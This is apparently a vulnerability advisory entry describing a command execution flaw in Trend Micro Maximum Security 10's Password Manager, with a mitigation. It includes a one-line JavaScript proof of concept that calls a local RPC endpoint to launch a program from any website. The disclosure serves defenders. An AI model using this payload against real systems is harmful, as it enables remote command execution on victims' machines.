vendor:
Maximum Security 10
by:
Tavis Ormandy
7,5
CVSS
HIGH
Arbitrary Command Execution
78
CWE
Product Name: Maximum Security 10
Affected Version From: Trend Micro Maximum Security 10
Affected Version To: Trend Micro Maximum Security 10
Patch Exists: YES
Related CWE: N/A
CPE: a:trend_micro:maximum_security_10
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2013
Trend Micro Maximum Security 10 Exploit
When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup. This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests. It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute(). This means any website can launch arbitrary commands, like this: x = new XMLHttpRequest(); x.open('GET', 'https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true); try { x.send(); } catch (e) {};
Mitigation:
Disable the Password Manager component of Trend Micro Antivirus.